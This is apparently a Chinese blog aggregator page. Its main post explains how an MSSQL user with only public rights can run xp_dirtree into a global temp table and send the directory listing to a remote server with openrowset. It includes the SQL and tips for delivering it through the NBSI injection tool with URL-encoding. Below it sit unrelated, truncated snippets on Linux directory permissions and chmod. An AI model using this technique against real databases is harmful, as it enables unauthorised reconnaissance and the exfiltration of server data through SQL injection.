弒神s blog
提起public許可權的使用者估計很多人也覺得鬱悶了吧~n久以前看了一篇《論在mssql中public和db_owner許可權下拿到webshell或是系統許可權》的文章(名字真長-_-!!!),裡面說到沒辦法利用xp_regread,xp_dirtree…這些儲存過程,原因是public沒有辦法建表,我在這裡矯正一下其實public是可以建表的~呵呵,使這些儲存過程能利用上,看下面的**吧
--建立乙個臨時表,一般的表我們是無辦法建立的,我們只能建立臨時表
#-----為本地臨時表
##----為全域性臨時表
create table ##nonamed(
dir ntext,
num int
--呼叫儲存過程把執行回來的資料存到臨時表裡面
insert ##nonamed execute master..xp_dirtree c:,1
--然後採用openrowset函式把臨時表的資料導到本地mssql 的dirtree表裡面了
insert into openrowset(sqloledb, 192.0.0.1;user;pass, select * from northwind.dbo.dirtree)
select * from ##nonamed
以上方法,也就是說public可以遍歷使用者伺服器的目錄
在nbsi中,只要把臨時表名加前加##就可以了,但要注意url轉碼,即寫成:%23%23nonamed就ok了!
linux下目錄的許可權解說
在linux系統中,許可權概念的重要性相信不需要我來講,所謂的許可權無非是r,w,x,檔案的各種許可權都很好理解,較難理解的是目錄的許可權,下面我主要對目錄的許可權說一下自己的看法 看過linux核心方面書的朋友應該都知道目錄於核心而言也是檔案,目錄是特殊的檔案,它的內容包括 這個目錄下的檔名列表以...
Ubuntu下修改目錄許可權
ubuntu下修改目錄許可權需要先用 sudo 來獲得管理員許可權,格式如下 sudo chmod 600 只有所有者有讀和寫的許可權 sudo chmod 644 所有者有讀和寫的許可權,組使用者只有讀的許可權 sudo chmod 700 只有所有者有讀和寫以及執行的許可權 sudo chmod...
linux下目錄和許可權
1.1 linux系統中三種基本許可權 檔案許可權的定義 對某個檔案或目錄的訪問控制 訪問限制 檔案的三個屬性 l 使用者的所有者 屬主 當使用者建立乙個檔案,預設這個使用者就是這個檔案的屬主 l 使用者的群組所有者 屬組 使用者的主要組就是這個檔案的屬組 l 其他人 不是以上兩者 例如 ll to...